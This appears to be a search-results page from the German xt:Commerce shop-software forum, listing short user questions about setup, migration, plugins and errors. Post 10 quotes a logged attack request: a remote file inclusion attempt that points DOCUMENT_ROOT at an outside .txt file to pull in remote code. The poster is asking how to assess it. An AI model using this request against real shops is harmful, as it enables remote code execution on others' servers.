Jump to content
xt:Commerce Community Forum

Search the Community

Showing results for tags 'shopsystem'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • xt:Commerce - Professionelle eCommerce Shopsoftware
    • Fragen zur Software
    • xt:Commerce Plugins
    • xt:Commerce 4 Sprachen
    • xt:Commerce Online Handbuch
    • Häufige Fragen (FAQ)
    • Fragen zur Software (Pre Sale)
    • Anleitungen - Patches - Downloads
  • xt:Commerce Office - Shop & Warenwirtschaft
    • Allgemeine Fragen
  • xt:Commerce Allgemein
  • xt:Commerce 3 Shopsoftware Community Area (nur Lesen)
    • Allgemeine Diskussionen
    • Installation und Konfiguration
    • Shopbereich
    • Admininterface
    • Modul Entwicklung
    • Template System
    • xt:Commerce Schnittstellen ERP Systeme
    • PHP & MysQL Forum
    • HTML & CSS

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biografie


Wohnort


Interessen


Beruf

Found 21 results

  1. Hi, hatte das Thema schon in einem anderen Forum, allerdings wars da wohl doch etwas deplatziert Deshalb hier nochmal: Hallihallo, wir sind seit 1996 Kunde von Gandke und Schubert (GS), mittlerweile ja Sage Software. Seither läuft bei uns im Ladengeschäft GS-Auftrag im Netzwerbetrieb. Mehr oder weniger stabil aber dennoch zufriedenstellend und bisher ohne grössere Katastrophen. Seit 2004 betreiben wir zu unserem Ladengeschäft noch einen Online-Shop für Sportartikel, welcher mit GS-Shop von Sage betreiben wird. Anfangs noch relativ ahnungslos, was ein online-shop alles können muss / sollte, erschien uns GS-Shop als tolle Lösung. Stichworte wie Artikel / Kunden / Bestellungs-Import /Export auf einen Klick (was ja zugegebenerweise auch so ist) haben uns da überzeugt. Nur leider sind wir mittlerweile der Meinung dass 1.) Sage Software der letzte Haufen ist (furchtbare Firmenmentalität, was Flexibilität und Kundenfreundlichkeit angeht, von Kulanz beim Support und Problemen erst gar nicht zu sprechen) 2.) bei GS-Shop ein wichtiges Feature (evtl das wichtigste) eines Online-Shops schlichtweg nicht vorhanden ist: Die Auffindbarkeit durch Suchmaschinen!! Durch die von Sage angewandte Technik (JavaScript) im kompletten Shop System, werden Suchmaschinen-Spider und Bots einfach ausgeschlossen. D.h. nur durch workarounds wie statische html-exportseiten, googlebase-exporte, googleadwords, eine doorway-page(!) usw. schaffen wir es in den Google-index! Mittlerweile ist unser Online-Shop wirklich gut besucht, was wohl weniger auf die Software zurückzuführen ist, sondern vielmehr aufs Marketing und unseren Ruf. Unser Wunsch ist es nun einen Online-Shop zu betreiben, welcher vollständig googlebar ist und auf dem man auch von extern auf bestimmte Artikelseiten verweisen (dank seltsamen sessionids von GS-Shop habe ich bisher in einschlägigen Foren noch keinen Link gefunden, den ein User auf uns gepostet hat, welcher nciht abgelaufen war. Die meisten user kopieren ja nur die URL aus der Adressleiste; und diese URl ist durch die SessionIds nach einer halben Stunde ungültig. Furchtbar!). Wir sind nun, was den Export von Artikeln in den Online-Shop angeht und die Bearbeitung von Bestellungen (GS-Auftrag & GS-Shop), etwas verwöhnt, da das ja wirklich gut funktioniert. Trotzdem wollen wir in erster Line von GS-Shop weg! Höheren Userzahlen geben wir da einfach den Vorrang! Nun wäre es natürlich schön, wenn uns jemand von seinen Erfahrungen und Tipps berichten könnte (evtl befinden sich ja GS-Umsteiger unter euch). Die Boardsuche hat zwar was gebracht, aber nciht auf meine konkreten Fragen (welche im Verlauf dieses Threads wohl noch folgen werden). Also, nochmal kurz zusammengefasst: -GS-Shop -GS-Auftrag Comfort (Mehrplatzversion) -GS-Auftrag im Ladengeschäft als Kassenmodul in Betrieb -Suche nach geeigneter Shop-Lösung (xtc?) welche von Suchmaschinen gefunden wird. -Export von Artikeln, Kundendaten etc. in den OnlineShop -Import von Aufträgen aus dem Shop in die WaWi Wir sind mittlerweile auch bereit zu sagen dass wir auch die Warenwirtschaft umstellen würden, soweit das mehr oder weniger problemlos möglich ist, wenn es denn dann eine Möglichkeit zum Im-Und Export in xtc gäbe! Ich hoffe mal es ist klar geworden, was uns hier bedrückt ;-) und ich freue mich schon auf die Antworten. Daniel
  2. Hallo Community, Ich hoffe, das Forum wird weiter wachsen weil ich gute Meinungen über dieses Shopsystem hörte. 1.Ich möchte Unikate/Einzelstücke verkaufen, jeden Tag werde ich circa 5 Artikel einstellen wollen, das sollte recht zügig gehen. 2.Es sollen pro Artikel circa 10 Fotos untereinander abgebildet werden. Danke für eure Antworten.
  3. Hallo, ich verwende z.Zt. das xtcommerce Shopsystem f?r meinen Shop. Aufgrund der erweitereten M?glichkeiten, w?rde ich gerne auf Joomla umsteigen. F?r Joomla gibt es ja auch Shopsysteme, sind diese Vergleichbar mit xtcommerce - gibt es hierzu schon Erfahrungen (m?glichst in deutsch) - bzw welches w?rdet Ihr empfehlen - oder sollte ich besser bei xtcommerce bleiben MFG Peter
  4. Hallo, ich habe lange Zeit auf ebay und Amazon verkauft und habe nun mehr oder weniger die Schnauze voll davon. Deshalb bin ich jetzt auf der Suche nach einem Shopsystem. Wichtig ist, dass ich die Preislisten von meinem Distri problemlos importieren kann dass ich Schnittstellen zu billiger.de, günstiger.de, ciao, geizhalz, amazon usw usw. intigriert habe und die Produkte automatisch gelistet werden. dass man sofortüberweisung, paypal, moneybookers usw einfach einbinden kann. ich würde mich freuen wenn mir jedemand sagen könnte ob das mit XTC so möglich ist und am besten auch gleich welches Plugin ich benötige. Danke schonmal im Voraus!
  5. Hallo, wir planen einen neuen Shop aufzumachen und ich wollte mich nun einmal erkundigen, ob dieses Shopsystem auch solch einen Shop und die Funktionen wie hier Beispielshop erfüllen kann. Über Antworten freue ich mich sehr, da es für mich alles Neuland ist.
  6. Hey ho community, ich habe eine Frage... wo befindet sich die datei der smarty enginge wo alle smarty tags deklariert sind. weil ich sehe in der shopping_cart.html nur Smarty tags und wollte gerne die ausgabe des Warenkorbs abändern aber dazu muss ich wissen wo die smarty tags sich befinden. würde mich auf eine antwort freuen, mfg
  7. hallo, bin gerade erst in den Anfängen mit dieser Software - Frage: kann ich auch in VEYTON 4 auch ein altes anderes ShopSystem integrieren??? sorry, für diese Blöde Anfänger frage.....;)
  8. Hallo, wir betreiben eine Druckerei und suchen ein Shopsystem wo der Kunde nach der Bestellung seine Daten an uns übermitteln kann. Kann mir da vielleicht jemand helfen?
  9. Hallo Community, Wäre dankbar hätte jemand erfahrenes von Euch ein paar Ideen für mich. Ein Telefonieprojekt (VoIP) soll ein shopsystem bekommen. Als "Produkt" sollen lediglich drei unteschiedliche Beträge als Prepaid Guthaben über moneybookers o.ä. akzeptiert werden. Es geht darum den Vorgang zu automatisieren: Im Registrierungsprozess soll eine Kundennummer/Kundenname im Format voip1, voip2 usw. bis unendlich automatisch fortlaufend vergeben werden zzgl. des vom Kunden gewählten Passwort. Nach Wertstellung der Bezahlung soll automatisiert die online Eintragung der Daten Kundenname und Paßwort plus Überweisungsgutschrift in die Felder der online Verwaltung erfolgen um so den Kundenaccount freizuschalten. Freue mich auf einen Vorschlag wie/ob das mit Veyton zu realisieren bzw. weitergehen zu automatisieren ist.
  10. Guten Tag, heute ist mir im Who's online Modul dieser Besucher aufgefallen. Er hat offensichtlich versucht auf Shopinterne Daten zuzugreifen, mit folgendem, per Hand eingegebenen Aufruf: 00:07:38 0 Guest 91.121.89.135 20:09:31 20:09:31 /index.php?cat=c802_Handys---Navigation.html%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.anyche.com/goods_img1/satu.txt?? Was könnte er damit bezwecken wollen und wie muss ich das bewerten? Vielen Dank für Ratschläge.
  11. Hallo, ich bastle jetzt seit 3 Tagen unentwegt an dem Shop rum und bin schier am Verzweifeln. -master/Slave funktioniert nicht, oder ich bin zu doof es einzurichten. -Versandkosten/Versandarten werden nur jeweils einer beim Bestellen angezeigt, ich hab das noch nicht ganz verstanden wie ich die jeweiligen Einstellungen setzen soll. -Kann ich mir E-Mails testweise senden lassen um zu sehen ob das Logo jetzt eingeblendet ist? -Warum werden immer wieder Leerartikel angezeigt? Hab noch kein System gefunden wann ein Leerartikel generiert wird. -Versandarten und die Zuweisung kann ich im Handbuch auch nicht finden, Sofortkasse zb. nur Abholung. -Teilweise sind die Contentblöcke ohne Inhalt -Hab nach Anweisung versucht PayPal einzurichten und dann erst nach dem 4. Mal zufällig im Forum gelesen, dass der Pfeil im Handbuch leider falsch ist. -Gibt es Module die man laden kann ohne Bezahlung (Versandkosten DHL/Hermes oder sowas in der Art), oder kostet ab jetzt alles Geld. -Werden die Angaben in dem Footer auf jeder Seite gemacht oder kann man das einschränken? -Wenn man solche "Zeichensätze" bearbeiten will, welches Programm muß man dafür kaufen? Ich lese immer von Dreamwaver, ist das nötig um mit dem Shop zu arbeiten? (Kostet ja richtig viel Geld das Dreamwaver) Ich habe weder Programierkenntnisse Kenntnisse wie ich die Software verändern könnte, hab mir deshalb auch ein Template gekauft. Die Probleme waren aber schon vor dem Template, also an dem scheint es nicht zu liegen. Mein Shop ohne Artikel (Sind noch nicht frei gegeben-macht ja ohne Bestellsystem / Zahlung /Versand ) auch wenig Sinn: Ballgag und Bondage Shop Ich habe vorher die XT Software aus dem jahr 2003 gehabt und muß sagen das ich langsam bereue das ich die neue Version gekauft habe. In der alten Version waren Versandarten vorkonfiguriert, Zahlungsarten vorkonfiguriert und sogar 5 verschiedene Farben (Mini Templates) waren vorhanden. Die alte Software hat mir als Laien einfach die Möglichkeit gegeben ohne mich Stunden durch ein Forum zu lesen, einen Shop einzurichten. Ich war von der Hülle begeistert, doch der Inhalt ist für mich ohne Programmierkenntnisse einfach zu heavy. Gibt es irgendwo ein Buch (Das eine kommt ja erst im September) wo das Einrichten des Shops Schritt für Schritt erklärt wird? Das handbuch ist ja etwas dürftig. Kann mir jemand helfen, evtl. auch per E-mail oder Telefon?? Als neustes sehen meine Conten so aus wie im Bild. (Hab Morzilla wie empfohlen verwendet und auch den IE8)
  12. Hallo, ich habe den Shop seit einer WOche installiert und bin eigentlich fertig für den Livestart. Bei den Testbestellungen habe ich gemerkt das der Shop keine emails versendet. Keine Anmeldebestätigung oder Bestellbestätigung. sendmail pfad und email system sind richtig eingestellt. Provider sagt alles ist gut. Weiss jemand eine Lösung? Danke im Vorraus
  13. Hallo , ich möchte einen kleinen Online-Shop machen... Mit wirklich wenigen Artikeln Bisher habe ich mit LagerBob Pro gearbeitet... (eBAY) Jetzt möchte ich unabhännig einen Shop machen , folgendes soll möglich sein: Status der Artikel (Grün Lieferbar , Rot: Wird bestellt) Außerdem soll der Kunde die Möglichkeit haben , wenn der Artikel wieder auf Lager ist , per e-mail informiert zu werden! Hatte das Shopsystem: xt:Commerce Shopsystem v3.04 mir angesehen... Ist das damit möglich ???? Habe dann noch eine frage : Kann das "xt:Commerce Shopsystem v3.04 " auch die Bestellabwicklung automatisieren ( Bestellbestätigung , Erstellung von Verwendungszweck , online Banking Abgleich...) Oder muss ich dafür z.b mein LagerBob Pro verwenden ? VIELEN DANK
  14. Hallihallo, wir sind seit 1996 Kunde von Gandke und Schubert (GS), mittlerweile ja Sage Software. Seither läuft bei uns im Ladengeschäft GS-Auftrag im Netzwerbetrieb. Mehr oder weniger stabil aber dennoch zufriedenstellend und bisher ohne grössere Katastrophen. Seit 2004 betreiben wir zu unserem Ladengeschäft noch einen Online-Shop für Sportartikel, welcher mit GS-Shop von Sage betreiben wird. Anfangs noch relativ ahnungslos, was ein online-shop alles können muss / sollte, erschien uns GS-Shop als tolle Lösung. Stichworte wie Artikel / Kunden / Bestellungs-Import /Export auf einen Klick (was ja zugegebenerweise auch so ist) haben uns da überzeugt. Nur leider sind wir mittlerweile der Meinung dass 1.) Sage Software der letzte Haufen ist (furchtbare Firmenmentalität, was Flexibilität und Kundenfreundlichkeit angeht, von Kulanz beim Support und Problemen erst gar nicht zu sprechen) 2.) bei GS-Shop ein wichtiges Feature (evtl das wichtigste) eines Online-Shops schlichtweg nicht vorhanden ist: Die Auffindbarkeit durch Suchmaschinen!! Durch die von Sage angewandte Technik (JavaScript) im kompletten Shop System, werden Suchmaschinen-Spider und Bots einfach ausgeschlossen. D.h. nur durch workarounds wie statische html-exportseiten, googlebase-exporte, googleadwords, eine doorway-page(!) usw. schaffen wir es in den Google-index! Mittlerweile ist unser Online-Shop wirklich gut besucht, was wohl weniger auf die Software zurückzuführen ist, sondern vielmehr aufs Marketing und unseren Ruf. Unser Wunsch ist es nun einen Online-Shop zu betreiben, welcher vollständig googlebar ist und auf dem man auch von extern auf bestimmte Artikelseiten verweisen (dank seltsamen sessionids von GS-Shop habe ich bisher in einschlägigen Foren noch keinen Link gefunden, den ein User auf uns gepostet hat, welcher nciht abgelaufen war. Die meisten user kopieren ja nur die URL aus der Adressleiste; und diese URl ist durch die SessionIds nach einer halben Stunde ungültig. Furchtbar!). Wir sind nun, was den Export von Artikeln in den Online-Shop angeht und die Bearbeitung von Bestellungen (GS-Auftrag & GS-Shop), etwas verwöhnt, da das ja wirklich gut funktioniert. Trotzdem wollen wir in erster Line von GS-Shop weg! Höheren Userzahlen geben wir da einfach den Vorrang! Nun wäre es natürlich schön, wenn uns jemand von seinen Erfahrungen und Tipps berichten könnte (evtl befinden sich ja GS-Umsteiger unter euch). Die Boardsuche hat zwar was gebracht, aber nciht auf meine konkreten Fragen (welche im Verlauf dieses Threads wohl noch folgen werden). Also, nochmal kurz zusammengefasst: -GS-Shop -GS-Auftrag Comfort (Mehrplatzversion) -GS-Auftrag im Ladengeschäft als Kassenmodul in Betrieb -Suche nach geeigneter Shop-Lösung (xtc?) welche von Suchmaschinen gefunden wird. -Export von Artikeln, Kundendaten etc. in den OnlineShop -Import von Aufträgen aus dem Shop in die WaWi Wir sind mittlerweile auch bereit zu sagen dass wir auch die Warenwirtschaft umstellen würden, soweit das mehr oder weniger problemlos möglich ist, wenn es denn dann eine Möglichkeit zum Im-Und Export in xtc gäbe! Ich hoffe mal es ist klar geworden, was uns hier bedrückt ;-) und ich freue mich schon auf die Antworten. Daniel
  15. Hallo Leute Brauche dringend hilfe ich hab auf meinem Shop folgendes Problem...schaut bitte: www.shisha-shisha.de/xtcommerce Habe weil ich das Sofortüberweisungstool einbinden wollte eine Datei versehendlich gelöscht..Datei heißt application_top.php Hab diese Datei durch eine gleiche ersetzt die im Admin Ordner unter includes zu finden war. Seit dem geht gar nichts mehr...wer mir zu erst eine Passende Lösung geben kann bekommt eine Gratispfeife (Shisha) bei seiner Bestellung. BITTE HELFT MIR.... Michael von Shisha-Shisha.de
  16. - SPAMALARM - Sie benötigen mind. 1 Posting in unserem Forum um Links zu posten
  17. Hallo, Ich habe eine Frage an das Supporteam oder an alle die mir weiter helfen können. Wie kann ich ein Produktives Shopsystem local bei mir auf den Rechner über xammp instalieren?
  18. Hallo, wer von Euch hat eine funktionierende froggle.php Datei für das exportieren der Artikel nach Goggle Base für die Shopversion 3.0.3 und kann die hier zum download anbieten. BIG THX
  19. Hallo, ich m?chte die Daten der alten Shopsoftware siehe www.Body-Attack.de in die neue Shopsoftware siehe www.fitness-produkte.de ?bernehmen. Kann mir da jemand weiterhelfen? Gr??e Ben
  20. Ich bekomme Folgenden Fehler wenn ich den Shop Betreten m?chte Fatal error: Cannot redeclare xtc_image() (previously declared in c:\apache\htdocs\xtCommerce\inc\xtc_image.inc.php:21) in c:\apache\htdocs\xtcommerce\inc\xtc_image.inc.php on line 21 die Installation verlief soweit ganz gut, jedenfals waren keine Fehler zu sehen. jemand einen L?sungsvorschlag?
  21. Einen guten Morgen an alle XT Commerce-ler, Nach einigen kleinen Problemchen, die mit Hilfe des Forums (warum eigentlich min. 5 Suchbegriffe ?) auch gel?st wurden, funktioniert das Shopsystem jetzt erst einmal prinzipiell. Die Installation erfolgte in einem lokalen Netz, wobei auf dem Serverrechner das Paket Xampp installiert ist. Der Zugriff von den Clienten auf XTC dauert pro Abrage (Seite) immer so ca. 5-7 sec. (Browserzeile: Anfrage an 192.168.0.19 zwischengespeichert) Der Seitenaufbau selber geschieht dann in einem Sekundenbruchteil. Auf dem selben Server ist auch eine OSCommerce Version, die dieses Problem nicht hat. Also liegt es, denke ich, nicht am Server. Arbeite ich allerdings direkt am Serverrechner ist die Verz?gerung auch nicht da. Das Einschalten des Cache im Admin bringt auch keine Ver?nderung. Vielleicht kennt jemand das Problem und kann helfen. Version: XT-Commerce Version v2.0 RC1.2 Apache 2.0.48, MySQL 4.0.17, PHP 4.3.4, Perl 5.8.2, FileZilla FTP Server 0.8.7, phpMyAdmin 2.5.5 pl1, OpenSSL 0.9.7c, Freetype2 2.1.0, Webalizer 2.01, mod_perl 1.99_12, Turck MMCache 2.4.6, mcrypt 2.5.7, SQLite 2.8.11, JpGraph 1.14 Mercury Mail Transport System PHPBlender PHP ** Vielen Dank Olaf Methling
×
×
  • Create New...